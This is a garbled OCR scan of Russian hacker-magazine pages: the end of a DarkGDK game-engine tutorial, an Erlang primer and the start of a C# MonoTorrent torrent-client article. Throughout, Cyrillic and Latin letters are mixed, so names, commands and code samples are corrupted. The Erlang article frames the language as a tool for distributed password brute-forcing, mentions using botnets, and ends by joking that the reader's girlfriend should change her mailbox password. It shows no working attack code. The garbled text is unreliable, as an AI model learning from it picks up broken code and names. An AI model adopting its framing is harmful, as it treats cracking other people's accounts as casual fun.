этих чисел возвращается с помощью функции йЪКпй (аналог 
по функциональности объекта класса Напбот из С++). Функ- 
ция принимает параметром значение — предел отрезка чисел 
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от нуля доданного значения. Из этого отрезка, собственно, и выбирается 
случайное число. Следующая затем функция бѣЗсаІеОЪзѳсС изменяет 
размер сферы. Передаваемые ей параметры аналогичны параметрам для 
предыдущей функции (только здесь 2-ой, 3-ий и 4-ый параметры задают 
размер по каждой из осей). Функция сіЬСоіогОЬ^ есС устанавливает цвет. 
Параметры со 2-го по 4-ый влияют на количество составляющей цвета: 
красный, синий и зеленый, соответственно (режим Р6В]. 

Дальше насждутдве крайне вкусные функции! Первая из них — дляуправ- 
ления материалами, а вторая для управления освещением. Вызовом этих 
функций все дело и обходится — а вспомни-ка чистый ОігесіЗО, с которым, 
чтобы включить материалы и свет, приходилось не по-детски извращаться. 
Итак, первая из функций — (ЗЬЗеСОЬзесСЗресиІагРо^ег —устанав- 
ливает отражающие свойства материалов. Ее параметры: это имя объекта, 
материал которого мы хотим установить, и еще значение — мощность отра- 
жения. Вторая функция — (ІЪЗеШ^есСАтЪіепС — управляет окружа- 
ющим цветом. Здесь он просто отключается (второй параметр — 0). Теперь 
код за готовки полностью рассмотрен, и, взявееза основу, ты можешь 
приступить к программированию. 

В 0АККК0В0Т 

Наш разговор будет неполным без рассмотрения примера работающего 
игрового движка. Предлагаютебе загрузить с нашего диска ѴС++ проект 
ОагкПоЬоІ: (или хотя бы запуститьэкзэшник) и посмотреть на реализован- 
ную на нем заготовку игры, которую я для тебя разработал. Обязательно 
посмотри и возвращайся кчтению.Таккакжурнал не резиновый, я не буду 
приводить здесь весь исходник, рассмотрев только самое важное. 

Сначала — поле установки частоты перерисовки. Идет инициа- 
лизация графического режима функциями ОЬЗеСВізрІауМосі и 
ОЬМахіші з еШп6.от. Первая из нихустанавливает параметры экрана (ей 
передается ширина, высота и глубина). Вторая функция при запуске при- 
ложения разворачиваетокно на весьэкран (независимоотвыставленных 
параметров). Затем идут функции, выводящие текст и перерисовывающие 
экран. Следующая функция (СЬЗеССашегаКапде) устанавливает свойства 
камеры: ближнюю и дальнюю плоскости отсечения, определяющие 
отображаемое содержимое сцены. Все, что выходит за пределы плоскос- 
тей, на экран выводиться не будет! После установки камеры загружаются 
текстуры. Они будут наложены на ландшафт, предварительно пройдя 
процедуру смешения. Попросту говоря, будут наложены друг на друга. 
Функцию за грузки текстуры мы рассмотрели выше. Затем идет блок кода, 
который инициализирует и строитландшафт. Какя упоминал, в ОагкВОК 
есть функция генерирования ландшафта сІЪЗеСТеггаіпНеідІтШар. Ей 
передаются: имя объекта — ландшафта — и имя файла. Здесь-то мы ей и 
пользуемся, загружая карту высот из файла Ьтр. Затем масштабируем, 
освещаем и текстурируем (загруженными ранее текстура ми). За подроб- 
ностями обращайся к исходнику. Самое пристальное внимание обрати 
на загрузку *.х-файлов. Этоттип является родным для ОігесіХ. Функцией 



«ЗЬЪоайОЬз есД ( "зкуЬох.х" , зкуЬох) , которой передаются имя х-файла 
и имя объема (номер), загружается небесная оболочка (зкуЬох — датесіеѵ- 
термин). Она представляет собой окружающий куб с наложенными на 
внутренние стороны текстурами (это задний план). Последний загружаемый 
из файла объект — главный персонаж в виде робота. Он также загружается из 
х-файла, в котором, помимо информации об объекте и текстурах, хранится ани- 
мация. Следовательно, он уже анимирован, и нам надо только за грузить его 
и проигратьанимацию. Отакой возможности яуже упоминал. Послетого, как 
объект будет за гружен, вызывается функция сЗЪЗеШЪд есСЗрееС ( гоЬоС , 
12 0 ) стакими параметрами: имя объекта, куда загружены данные из файла, 
и скорость проигрывания анимации. Затем следуют две функции, первая 
из которых поворачивает, а вторая — перемещаетобъеюг. Последний этап 
инициализации —установка позиции иугла поворота камеры. 

Потом начинается цикл, в котором все самое интересное и происходит. 
Первым делом здесь объявляется переменная; ей присваивается значение 
— высота поверхности ландшафта в указанной точке. Высота возвраща- 
ется функцией сІЪОеСТеггаіпОгоипсШеідІШ стакими параметрами: 
объект (ландшафт) и два параметра — соответственно, координатыХиХ 
той позиции, высоту в которой надо определить. Затем следует могучий 
условный оператор: в нем проверяется, не нажата ли нужная клавиша. Если 
нажата, — выполняются действия: перемещаются или поворачиваются в 
заданном направлении робот и камера. Также, при нажатии клавиш, запус- 
кается и останавливается анимация робота; соответственно, функциями 
«ТЬЬоорОЬз есС и (ТЬЗСорОЬзесС, у которых один параметр: имя объекта, 
чьей анимацией надо управлять. Функция йЪРозіСіопОІ^есС переме- 
щаетобъект(в нашем случае — робота). У нее следующие параметры: имя 
объекта и три позиции по каждой координатной оси. 

Следующая функция — наиболееаппетитная. С ее помощью можно «привя- 
зать» камеру копределенномутобой месту. Вотмы ее и привязываем кроботу, 
передавая в фун кциюта кие параметры: текущее положение робота по оси X, 
текущую высоту поверхности плюс 1 (чтобы поднять камеру от земли), текущее 
положении робота пооси 2, идалее— дистанцию, высоту, сглаживание 
траектории движения и обрабатывать или нет столкновения камеры. Подошла 
очередь функции «ЗШрйаЬеТеггаіп, не имеющей параметров и просто об- 
новляющей ландшафт. Замыкающаятело цикла функция сіЬЗупс обновляет 
содержимое и перерисовываетэкран (эту функцию мы рассматривали). После 
цикла возвращаем управление операционной системе. Разобравшись с кодом, 
обязательно запусти и оцени игру (смотри скриншот«игра ОагкРОВОТ»]. 

В УДАЧНОГО СТАРТА! 

Конечно, автору не удалось рассмотреть (или хотя бы описать) всех возмож- 
ностей библиотеки ОагкООК. Однако такой грандиозной цели и не стави- 
лось. Каки везде в программировании, решений одной задачи существует 
очень и очень много. Я показал лишь одно из них. С помощью библиотеки 
Иагк ОИК можно взять удачный старт на дорожке игростроения. Если ты 
раньше не разрабатывал игры, возможно, сейчас самое время начать. ИНИ 
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НАУЧНЫЙ БРУТФОРС) 



ЗНАКОМИМ СЯ С ЕКІ.АМ6 — ЯЗЫКОМ ПРОГРАММИРОВАНИЯ 

Д^^А^^Д^^^Вх СИС^Я 




^ 0 Каждому из нас знакома проблема, когда 

^ ^Оного юзверя никак не хочет поддаваться брутфорс^ХИ каждого, наверняка, ^ 



параноидально-настроен- 

— / I 



посещала мысль, что было бы здорово замутить под это дело распределен- 



Олше вычисления. Но тут мало иметь свой ботнет — необходим соответству-- 
Т) і с~\ „ і і^і і ^ і і і с — : 

ющий инструментарий. Увы, большей частью он заточен под всякую науч- 
ную пургу. Но что тебе мешает написать прогу для распределенного брута? 

■уѴЧ -**— N >"“N.1 “I -1 I .*-— N / — I — 1 I У ^ .✓*— N -|>^ I \ 

Для этого есть прекрасный инструмент — язык Егіапг! 

И ь ѵ_хі_ Ѵ_^1_ — с— у Ѵ_^| Со. —1— -■ А. > — ' — I — V — « ] • 



-ехрогД ( [дзогі:/!] ) . 



Н НАФИГА МНЕ НОВЫЙ ЯЗЫК? 

Вопрос не в бровь, а в глаз. Действительно, зачем изучать новый язык 
программирования, если настоящему сооіхакеру, кроме АззетЫег/С, для 
счастья ничего не надо? А тут раз — и еще один язык! Все верно — любую 
задачу можно решитьс помощью одного лишьассемблера. Трудозатраты 
при этом будуттакие, что почти любой проект превращается в хронический 
долгострой. С другой стороны, новые высокоуровневые языки программи- 
рования, вроде С# или ^ѵа, позволяюточень быстро писать программный 
код и хранят в своем арсенале много полезных фишек, делающихжизнь 
кодера более шоколадной. Только вотсистемщик, пишущий драйвер или 



модуль ядра на одном изтаких языков, получит вынос мозга всіеѵ/піііі. На- 
деюсь, ты понял, кчемуя веду — для каждого тип а задач есть свои наиболее 
эффективные инструменты. 

Взятьтуже проблему брутфорса. Его скорость напрямую зависит от коли- 
чества задействованных вычислительных ресурсов. Хакеры, серьезно 
замороченные на этом деле, по-разному выкручиваются из ситуации. Одни 
усиленно курят доки по нецелевому использованию графических процес- 
соров. Другие создают сеть из компьютеров (легально, или плодят ботов) 
и вешают на нее распределенные вычисления. На этом я предлагаю оста- 
новиться подробнее. Вопрос, который неизбежно встает перед всеми, кто 



► 110 



ХАКЕР 10/118/08 










гп 




IV 



ициальныи сайт мощнейшего инструмента 

■ ѵ -' а / 



і_ъіѵо1с] ++ дзогЕ ( [ 



решил испытатьсебя в распределенных вычислениях: «каконо работает?». 

В качестве ответа серьезные кодерские конторы предлагаютспециальный 
софт, позволяющий развернуть систему распределенных вычислений. 

Ноу всякого универсального решения найдется масса недостатков, основной 
из которых — офигенная избыточность. Большинство заложенных в систему 
возможностей остаются незадействованными. Аэто значит, мы имеем дело 
с непродуктивным использованием вычислительных мощностей, которыху 
наситаквобрез! Выход?0н прост, — написатьсвою систему распределен- 
ных вычислений, заточенную под себя любимого. Нотогда придется ломать 
голову над новым вопросом — какой инструмент выбрать для разработки? 
Возможностями какого языка воспользоваться? Воттут-то я настоятельно 
рекомендую тебе обратить внимание на язык Егіапд. 

Для начала — немного истории. Егіапд был создан в небезызвестной компа- 
нии ЕгісзБоп.Ха.тыужедогадался, что означает название Ег1апд?«Конечно, 
это Егісззоп Еапдиаде!»Только не правты, гринго. Эрланг— это имя крайне 
умного мужика, в честь которого и назвали единицу измерения телекоммуни- 
кационного трафика ( Судя по имени , он настоящий викинг, — Прим, ред.) . 
Егіапд относится кфункциональным языкам программирования. Еслиутебя 
на почветупой программы университетского обучения выработалось стой- 
кое отвращение клямбда-выражениям, будь осторожен и потребляй Егіапд 
очень дозировано во избежание соматических (да простит меня редактор за 
упомянутый всуе медицинскийтермин) осложнений. Синтаксис языка похож 
на Ргоіод. И это неслучайно — именно к Ргоіод уходят его корни. 
Теперьсобственноотом, чемтакхорош Егіапд. В наш смутный век 
а ндронных коллайдеров (пишу эту фразу на тот случай, если ты сейчас 
читаешьжурнал, сидя в ѵа и П; 13, полируя энергоброню и коротая времени до 



выхода на поверхность в поисках водяного фильтра] бал правит концепция 
объектно-ориентированного программирования. Ее идею можно выразить 
тремя словами: весь мир — объекты. Концепция, лежащая в основе Егіапд, 
утверждает, что — ничего подобного, весь мир это процессы! И, черт побери, 
они правы — какая польза отобъектов, если они не будут иметь методов, 
через которые взаимодействуютдругс другом и окружающей средой? Со- 
ответственно, программа, написанная на этом языке, представляет собой 
совокупность процессов, взаимодействующих через обмен сообщениями. 
Что? Тебе послышалось слово «надежность»? Нет, брат, не послышалось и 
твое пораженное хентаем подсознание вернотебе нашептывает: «память, 
память, разделяемая память». Почему деревья растут, а программы 
падают? Потому что практически все языки программирования используют 
концепцию разделяемой памяти. Отсюда — все проблемы: кто-то прочитал 
то, что не должен был читать, кто-то перезаписал то, что не должен был 
перезаписывать. В Егіапд подобная ситуация невозможна в принципе, по- 
тому что вместо того, чтобы устраивать из системной памяти коммунальную 
квартиру, в Егіапд, какуже было сказано, используется обмен сообщениями 
между процессами. Однако, основная фишка не в этом, а втом, что про- 
цессы прекрасно масштабируются и распараллеливаются (и при этом — с 
минимальными накладными расходами]. Поэтому Егіапд можно, не кривя 
бровью, назвать инструментом номер один для создания систем распреде- 
ленных вычислений. 

Н А КАК ТУТ ВСЕ УСТРОЕНО? 

Прежде чем перейти к практике, давай наведем порядок в голове и уясним 
важные моменты. Во-первых, Егіапд является кросс-платформенным 



Запустить 
Ег1ап§-программу 
в окошках 

Чтобы запустить на выполнение Егіап^-программу в обход диало- 
гового режима (то есть, как обычное приложение), нужно всего 
лишь подсунуть интерпретатору пару ключей: -позЬеІІ (подавляет 
интерактивный режим) и -тип, после которого нужно последова- 
тельно указать имя модуля, имя функции, и опционально — пара- 
метры, передаваемые функции при запуске. 



Некоторые проек- 
ты, написанные 
на Егіапд 

• Уаѵѵ8 — очень шустрый и очень надежный, да еще и нетребова- 
тельный к ресурсам веб-сервер Гуаѵуз.ЬѵЬег.ог^) . 

• Чатовский движок в крупнейшей социальной сети РасеЪоок. 

• Сервер для ЭаЬЬег-сетей Е^аЬЬе^сІ Г тѵѵѵ.еіаЬЬегсІ.іт) . 

• И, наконец, самый известный проект — распределенная база 
данных ЗітрІеОВ, на которой работает интернет-гигант Атагоп. 
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языком. Технически это реализованотакже, каки в Жабе — программа 
транслируется в байт-код, исполняемый виртуальной машиной. Поскольку 
Егіапд относится кфункциональным языкам, забудь отакой глупости, как 
операция присваивания. Ее просто нет! 

Чтобы передать информацию от одного процесса кдругому, какяуже упо- 
минал, используются сообщения. У каждого процесса есть свой почтовый 
ящик, из которого он извлекает поступившие сообщения. И здесьснова 
проявляется крутизна Егіапд, таккакпроцесс вовсе не обязан читать все 
сообщения из своего почтового ящика. Возможно использование филь- 
тров, на основании которых будет осуществляться избирательная выборка 
сообщений. 

Следующая фишках Егіапд тебе не придется заботиться об отлове всех 
исключительных ситуаций и написании для них обработчиков. Да-да, за- 
нудная парочка Ігу-саІсИ осталась за бортом. Атеперь попробуй догадаться, 



История Егіапд 

Родина языка — лаборатория Егісззоп Сотриіег Зсіепсе 
ЬаЪогаІогу (С5ЬаЬ) . По большому счету, все началось с потребнос- 
ти немного усовершенствовать язык Рго1о§, добавив в него под- 
держку параллелизма. В 1990 году язык обзавелся собственным 
синтаксисом (который, впрочем, так и остался похожим на син- 
таксис Рго1о§) . Тогда же была разработана и виртуальная машина 
Егіапд. А в 1998-м, через восемь лет после своего выхода в большое 
плавание, язык Егіапд с набором библиотек был опубликован под 
открытой лицензией. 



за счет чего это стало осуществимо: или программы, написанные на Егіапд, 
сверхнадежны и никогда не падают, даже будучи написанными быдло-ко- 
дерами, или в Егіапд встроена мощная система обработки ошибок? Какой 
бы вариантты ни выбрал, он будетнеправильным. Согласно философии 
Егіапд, если процессупал, — туда ему и дорога. Исповедуется здоровый 
и прагматичный пофигизм. Болеетого, процесс, в котором возникли 
проблемы, делает все возможное, чтобы система отправила его к праотцам. 
Он даже называется «процесс-камикадзе» [кстати, большую часть 
времени автор статьи работает программером в Японии и в 
совершенстве владеет техникой сепукку и древним искусством 
связывания женщин , так что можешь написать ему на эту тему, 
— Прим. ред.]. 

Ты скажешь: а какже другие процессы, они же будут пытаться взаи- 
модействовать супавшим «товарищем»! Нет, — если процесс падает, 
родительский процесс получает соответствующее уведомление и, немного 
погоревав, продолжаетжить дальше. 

Дальше! Процессы в Егіапд изолированы друг от друга. Азначит, при распа- 
раллеливании задачи можно забыть про кошмарные мьютексы, семафоры, 
взаимные блокировки. Это же просто праздник какой-то! 

И наконец, пара слов отом, какс помощью Егіапд создаются распределен- 
ные системы. Работающий экземпляр виртуальной машины называется 
узлом (ІЧосІе]. Каждый узел знает о существовании других узлов на этой же 
машине и можете ними взаимодействовать. С тем же успехом узел может 
взаимодействовать и сузлами, существующими на других машинах, доста- 
точно скормить ему адрес удаленной системы. 

г ГДЕ ЖЕ МНЕ ЕГО ВЗЯТЬ? 

Если ты дочитал до этого абзаца, значит, тема поднятия собственной систе- 
мы распределенных вычисленийтебя заинтересовала. Дай догадаюсь, что 
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Егіапд в интерактивном режиме 



тебя сейчас интересует больше всего? Наверняка, вопросы — где достать 
Егіапд и сколько лавандосов за него попросят. Начнусо второго. Возрадуй- 
ся — Егіапд бесплатен, да будет благословен РМ5! 

В доступный для загрузки с сайта егіапд. огд дистрибутив входят: ком- 
пилятор языка, среда исполнения с поддержкой эмуляции многопро- 
цессорных систем, документация, а также набор библиотек и инстру- 
ментов ОТР. Среди последних следует отметить Мпезіа — написанную 
полностью на Егіапд распределенную СУБД с поддержкой репликации 
данных и возможностью динамического изменения их схемы и обнов- 
ления своего кода без приостановки работы. Мпезіа использует Егіапд 
в качествеуправляющего языка и делает работу с распределенными 
данными полностью прозрачной для приложений — они работают 
абсолютно одинаково как с локальными данными, так и размещенными 
на удаленном узле. 

Конечно же, мы выложили инсталляционный пакет Егіапд на нашем диске, 
и тебе не придется качать его из Сети. 

Если же ты прогуляешься до официального сайта Егіапд, то сможешь 
найти там какисходники языка (и собрать их под свою *Ыіх-систему],таки 
готовый инсталлятор под ѴѴіпбоѵѵз. Крометого, Егіапд входит в репози- 
тарии многих Ыпих-дистрибутивов и может быть установлен буквально 
одним кликом мыши через какую-нибудь попсовую систему вроде 
Вупарііс. Адептам командной строки тоже не придется себя утруждать 
нечеловеческими усилиями: все, что требуется — это ввести втерминал 
строку а рі-деі іпзіаіі егіапд. 

Еслиты решил пойти путем настоя щихджедаев, то устанавливай Егіапд 
из исходников. Сложи о го тут тоже ничего — распаковывай архив, а затем 
сотвори заклинание: 

. /сопіодиге 
таке 

зисіо таке іпзкаіі 

После инсталляции неплохо было бы проверить, всели у нас получилось. 
Для этого набирай втерминале команду егі. Ты должен увидеть баннер 
Егіапд — что-то вроде: 

$ егі 

Егіапд (ВЕАМ) етиіаког ѵегзіоп 5 . 5 . 1 [зоигсе] [азупс- 
Щігеас1з:0] [Мре] 

Езкеіі Ѵ5 .5.1 (аЬогС мібЪ. л О) 

Н МНЕ БЫ ЭТО... ШЕ КАКУЮ-НИБУДЬ 

Ачеготак? Консольже наш дом родной, ЮЕ — путь для слабаков. 
Насамомделе.глупоотказыватьсяотблагцивилизации. Поэтому напоследок 
кратко рассмотрим существующие средства разработки приложений на Егіапд. 
Сразу скажу, что поскольку последователей этого языка программирования 
гораздо меньше, чем любого попсового языка типа С# или ѴВ, то и со среда- 
ми разработки под Егіапд дела обстоят, мягко говоря, неважно. 

Первым идетвеликий и могучий Етасз. Трудно найти языкпрограммирова- 
ния, для которого не было бы реализовано поддержки в этом легендарном 
редакторе. Но здесь союз требует некоторых предварительных действий. 



Чтобы подружить Етасз и Егіапд, понадобится пакетегіапд-тобе. Не 
парься, он поумолчанию входит в инсталляционный пакет. Еслиты уже 
устанавливал моды на Етасз, то нижедлятебя небудетничего нового. Если 
же ты новичок в этом деле, то воттебе очень краткая инструкция: 

// Указываем путь к егіапд-тосіе и загружаем 
егІапд-зкагС 

(асМ-бо-Изб ' ІоасІ-раСЬ » ») 

(гедиіге ' егіапд-збагб ) 

/ / типы файлов , для которых будет активирован мод 
(асН-Цо-ЫзЦ 1 аибо-тосіе-аіізк 1 ("\\.ег1?$" 

. егіапд-тосіе) ) 

(асМ-бо-Изб 1 аибо-тосІе-аІізЦ 1 ( " \\ .1іг1?$ " 

. егіапд-тосіе) ) 

// пути к егіапд-окружению 

(зебд егіапд-гооб-сііг " /орС/1оса1/1іЬ/ег1апд" ) 
(абб-Цо-ІізЦ ’ехес-ракЪ. " /орЦ/1оса1/1іЬ/ег1апд/Ьіп" ) 
(зебд егіапд-тап-гооб-сііг " /орб/ІосаІ/ІіЬ/ 
егіапд/тап" ) 

Если Етасз тебя пугает, есть другие, менее экстремальные решения. 
Например, ЕгІіВігб — среда Егіапд-разработки, в основе которой 
лежит платформа ЫеіВеапз. А кто у ЫеіВеапз числится в заклятых кон- 
курентах? Правильно — Есіірзе. И если существует сборка ЫеіВеапз 
для Егіапд-разработки, то можно не сомневаться, что аналогичный 
инструмент найдется и у Есіірзе. И действительно, ЕгІЮЕ — плагин 
для Есіірзе, позволяющий использовать Егіапд-программистам эту 
великолепную ЮЕ. 

Весь кайф обламывает один нюанс. Дело втом, что ЕгІіВігб и ЕгІЮЕ — еще 
настолько сырые продукты, что годятся только для экспериментов. Для 
справки скажу, что возможности Етасз сзапасом перекрывают все самые 
мыслимые и немыслимыезапросы.Такчто, лучше потратить парудней 
на обуздание этого скакуна, чем заниматься нетрадиционным сексом с 
другими ЮЕ. 

г НУ И КАК МНЕ ЭТИМ ПОЛЬЗОВАТЬСЯ? 

Осваивать новый языкпотрадиции будем с вывода строки «Неііо, ѴѴогІб!» и 
простых арифметических операций: 

1> "Ііеііо, ѵ\гог1сі! " . 

"Ъеііо, ѵ^огіб!" 

2> 1 + 2. 

3 

3 > (2*3)+ 4. 

10 

Надеюсь, ты обратил внимание на такую фишку, какточка в конце каждого 
выражения. Все остальное весьма традиционно. 

Но неторописьс выводами. У многих, кто впервыеувидел код, написанный 
на этом языке, единственная реакция на увиденное — «сумасшедший, 
нечеловеческий синтаксис!». Однако для настоящего хакера это не станет 
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На диске ты найдешь 
не только инстал- 
ляционный пакет 
Егіапд для ѴѴіпсіоѵѵб- 
систем, но и среды 
разработки ЕгІуВігб 
и ЕгІІбе. В качестве 
дополнительного 
бонуса — справочная 
система от Егісббоп! 




€ 




> Ііпкз 

ѵѵѵѵѵѵ. егіапд .о гд 

— 0реп-5оигсе реа- 
лизация Егіапд. 
Егіапд по-русски: 
егіапд.бтіігііб.сот . 
Проекты, использую- 
щие Егіапд в качес- 
тве основного языка 
разработки: ѵѵѵѵѵѵ. 
егІапд-рго]есІ5.огд . 
Сообщество Егіапд- 
программистов — 
ѵѵѵѵѵѵ.ігарехіі.огд . 



преградой. Да, синтаксис, мягко говоря, странен. Но кнему 
быстро привыкаешь. 

Введи следующий код: 

1> X = 50. 

50 

2> У = (X + 10) * 2 . 

120 

Пока ничего интересного за исключениемтого, что все пе- 
ременныеу нас в верхнем регистре, — это не случайность, 
а одно изтребований языка. Давай присвоим переменной 
X новое значение:3>Х=10.Упс, интерпретатор выдает 
ошибку! В чем дело? Готовься к выносу мозга. Во-первых, 

X — это совсем нето, что мы подразумеваем под пере- 
менной в других языках программирования. Во-вторых, 
знак равенства в случае с Егіапд не является оператором 
присваивания. Теперь по пунктам. Переменные в Егіапд 
являются переменными одноразового присваивания. Если 
переменной еще не присваивалось никакого значения, она 
считается открытой. Закрытая переменная — та, которой 
уже однажды было присвоено значение и, следовательно, 
поменять его на другое уже нельзя. При таком раскладе 
знакравенства представляет собой всего лишь оператор 
приведения — сначала у нас было нечто неопределенное, а 
потом раз, и конкретное число. И поменять мы его не можем 
точнотакже, как Маша с пятого этажа вдруг не обернется 
Петей из другого подъезда. Можешь считать это теплым 
приветом от функционального программирования. 

Аесли переменные не меняютсвоегозначения.тоэто просто 
рай для многопоточного программирования, ведьтебе больше 
не придется заморачиваться с механизмом блокировок. Не 
нужен он и все. 

В Егіапд есть еще такое понятие, какатом. Атом — это имено- 
ванная константа. В отличиеотпеременной, названиеатома 
может быть написано строчными буквами. 

Следующий важный элементязыка — кортежи (Тиріез). Кортеж 



— это наборзначений ограниченной длины. Кортежограничи- 
вается фигурными скобками, а элементы кортежа отделяются 
друг от друга за пяты м и . Кортежи могут быть вл ожен н ы м и друг 
в друга. Вот примеры кортежей: 

1> {ок, 9} . 

{ок, 9 } 

2> {кгие, {127, 0, 0, 1}} . 

{кгие , {127,0,0,1}} 

3> {Ъох, {шЛкЬ, 10}, {Ь.еід}ік, 35}}. 

Есл и ко ртеж н е о гра н и ч и вать п о длине, то это уже будет список. 
Списки в отличие от кортежей заключаются в квадратные 
скобки. Еще список можно разделить на две части — заголовок 
(Ьеаб) и хвост (іаіі). Одно от другого отделяется с помощью 
вертикальной черты. Для чего это нужно, ты увидишь, когда мы 
будем писать свою распределенную систему для брутфорса. 

1> [опе, Сѵ\го, Скгее] . 

[ опе , Сѵ\го , Ытгее ] 

2> [1, 2| [3, 4, 5]] . 

[1,2,3,4,5] 

3> [{кеуі, ѵаіиеі}, {кеу2, ѵа1ие2}]. 

[ { кеуі , ѵаіиеі } , { кеу2 , ѵа1ие2 } ] 

Чтобы твои мозги не превратились в дареную котлету, 
прочие особенности языка оставим за рамками статьи. Ищи 
врезку со ссылками, по которым можно найти подробнейшую 
документацию, да еще и с примерами. А мы тем временем 
перейдем кне менее важному вопросу — создание полно- 
ценных программ. 

В КАК ЗАПУСТИТЬ? 

Для начала отом, как выйти из Егіапд-интерпретатора. Для 
этого нужно набрать команду ЬаІД ( ) . И не забудь проточку в 
конце строки! 

Ну, а теперь отвечаю на вопрос, вынесенный в заголовок 
раздела. Во-первых, не мешало бы научиться писать 
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полноценные листинги и скармливать их среде Егіапд целиком, 
вместо нудного секса с построчным прогоном через интерпретатор. 
Для создания программного кода можно использовать любой текс- 
товый редактор, не сохраняющий элементы форматирования. Файл 
должен иметь расширение ( . е гі) . Логическая структура Егіапд-про- 
граммы представляет собой набор модулей. Модули оформляются в 
виде отдельных файлов. Первым делом мы должны объявить начало 
модуля и заодно сообщить его название. Для этого используется 
конструкция 

— тосіиіе (название) . 

Кстати, название модуля должно совпадать с именем файла. Если потре- 
буется обратиться к модулю из другого файла, достаточно указать его имя 
и — через двоеточие — имя функции, которую нужно вызвать. В круглых 
скобках после имени функции, какобычно, передаем необходимые 
аргументы: 

тутой :Сез1с (8) . 

В случае если внутри модуля требуется объявить функцию, доступную извне, 
используется конструкция: 

— ехрогС ( [имя_функции/количество_аргументов] ) . 

Послетого, какфайл с модулем создан, его можно скомпилировать в байт- 
код простой командой 

с (имя_модуля) . 



Ксожалению, наша приятная беседа за чашечкойтекилы не можетпродол- 
жаться вечно. Ноя надеюсь, что Егіапд тебя заинтересовал какминимум 
настолько, чтобы начать знакомиться стой документацией по языку, что есть 
в Сети. Ну а мы стобой встретимся через месяц и поближе познакомимся с 
инструментами организации распределенных выч ислений. А чтобы упот- 
ребитьновыезнания с пользой — напишем систему для распределенного 
брутфорса.Такчто, пускайтвоя подруга меняетпарольна своем почтовом 
ящике! т 



Управление встроенной базой данных 
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Грекер 



ПРОГРАММИМ КРОСС ПЛАТФОРМЕННЫЙ токреит-клиент 



«Шесть лет прошло со времен первой войны людей и орков. . .» Действитель- 
но, прошло уже несколько месяцев с момента выхода статьи, в которой мы 
на практике разобрали процесс создания и парсинга Шггепі-файлов. К боль- 
шому сожалению, до самого вкусного момента (взаимодействия с трекером) 
мы добрались только сегодня — из-за проблем с отладкой готового примера. 
Лишь после нескольких сеансов электростимуляции толстым зондом со сто- 
роны редактора рубрики я смог это дело осилить и облечь в суровые строки 
журнальной статьи. 



В С# ВМЕСТО РЕІ.РНІ 

Для первой части статьи я писал пример на моем любимом ШефЫ, но сегод- 
ня мне предстоитему изменить и воспользоваться великим и могучим С#. 
Многие Оеіріпі-ненавистники возрадуются и громко закричат: «Неужели на 
ОеІрЫ нельзя создать полноценный клиент?». Вовсе нет, на ОеІрЬі можно 
написать практически любое приложение и торрент- клиент — не исключе- 
ние, но есть одно но. Какты понимаешь, протокол ВіПоггепІ: — это нехухры- 
мухры и просто так реализовать его в приложении неудастся. В настоящее 



время для дельфина не существует ни одной нормальной библиотеки/мо- 
дуля для упрощения взаимодействия с этим протоколом. Веете библио- 
теки, которые мне попадались на глаза, моральноустарели и требовали 
переписывания до60% кода. Заниматься переписыванием и изобретением 
очередного велосипеда — очень долго и нудно, а Ог.КІоипіг все повышал 
вольтаж на моих электродах, двигая гигантским реостатом и раскатисто 
хохоча. Поэтому я забил на эту идею и занялся поисками альтернативных 
библиотек— и на этот раз я искал недля ОеІрЬі.адля С#. Ксчастью.тут 
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Оф ициальный сайт мощнейшего инструмента 



Вот через это окно и добавляются новые Веіегепсе 



поиски были недолгими. Буквально на второй странице результатов, Гугл 
выдал мне ссылку на продвинутую библиотеку для работы с протоколом 
ВіЛЪггепР Недолго думая, я взял курс по найденномулинку и оказался на 
сайте проекта — МопоТоггепІіюгС#. 

В РАЗРЕШИТЕ ПРЕДСТАВИТЬСЯ: МОЫОТОЯЯЕЫТ 

Библиотека Мопоіоггепі: — одна из самых профессиональных и функци- 
ональных среди имеющихся альтернатив. Для программиста она предо- 
ставляет шикарный АРІ, позволяющий использовать протокол ВіЛоггепІ: 
с чрезвычайной легкостью, не задумываясь о лишних проблемах. Автор 
этого замечательного творения — Аіап МсВоѵегп. Изначально библиотека 
входила в проектБііттегоІСосІе 2006. Но после того как она засветилась 
и стала набирать фанатов, Аіап решил заняться доработкой МопоТоггепІ и 
сделать отдельный проект. Воттаки появился на светМопоТоггепІ, который 
сегодня используют все С#’ ники. Петь дифирамбы МТ можно очень дол го, 
поэтому давай отвлечемся от этого занимательного, но бесполезного дела 
и взглянем на четыре ключевые особенности, ради которых стоит юзать 
именно этулибу: 

1. Упрощенная процедура для создания/чтения Іюггепі-файлов. Всето, что 
мы научилисьделать в первой части статьи, в МопоТоггепІ делается в пару 
строчек кода. На скорость работы такая универсальность и упрощенность 
не повлияли — она находится на высоте и все действия (парсингфайлов, 
общение ссервером, переиндексация неза качанного файла] происходят 
очень быстро. 

2. Функции на любой случай! Возможностей МЫ слихвой хватит какдля 
разработки клиентских приложений (например, Тоггепі-клиентов], так и 
серверных (например, Тгаскег-серверов). Все необходимые классы уже 
реализованы. 

3. Простота использования. Код МопоТоггепІ написан очень качественно. 
Поэтому, еслиты нормально ориентируешься в ООП, то без труда сможешь 
разобраться с внутренностями этой библиотеки и по необходимости допи- 
сать пару возможностей самостоятельно. 

4. Кроссплатформенность. Разработчик МТ нехило постарался и сделал 
свое детище полностью кроссплатформенным. Поэтому грани между 
платформами размываются, и ты можешь разрабатывать хоть под ІІпіх-Ііке 
системы (смотри документацию по проекту Мопо: ЬНр://ѵѵѵ\лл/.топо-рго]есР 
сот] , хоть под ѴѴіпбоѵѵз МоЬіІе. 

г УСТАНОВКА МОЫОТОККЕЫТ 

Все, хватитзануднойтеории, давай переходить кдолгожданной практи- 
ке. Перед тем как использовать эту мощную л ибу, тебе нужно ее скачать и 
проинсталлить. Самую свежую версию библиотеки ты всегда можешь найти 
на ШрУ/ѵѵѵѵѵѵ.топоІоггепГсопп (на нашем БУБ лежит последняя на момент 
сдачи статьи версия]. Распакуй найденный/скачанный архив и попробуй 
произвести перекомпиляцию всех файлов. Минута ожидания и... натебя 
обрушивается водопад еггог’ов, в которых сообщается о невозможности 
обнаружения каких-то модулей. Не отчаивайся, сейчас мы это исправим. 



В качестве лекарства тебе придется добыть один оченьпопулярныйу 
программистов С#фреймворки подключитьего ксвоей ѴізиаІВіибіо. Беги 
на ЬирУ/пипіГога и качай новую версиюдистрибутива фреймворка (чтобы 
далеко не бегать, достаточно просто заглянуть к нам на БУО]. Установка 
фреймворка стандартная. Все, что от те б я требуется — просто за крыть Ѵізиаі 
БШбіо и запустить скачанный инсталлятор. Послезавершенияустановки 
твоя среда разработки уже будетзнать о местоположении библиотеки, а 
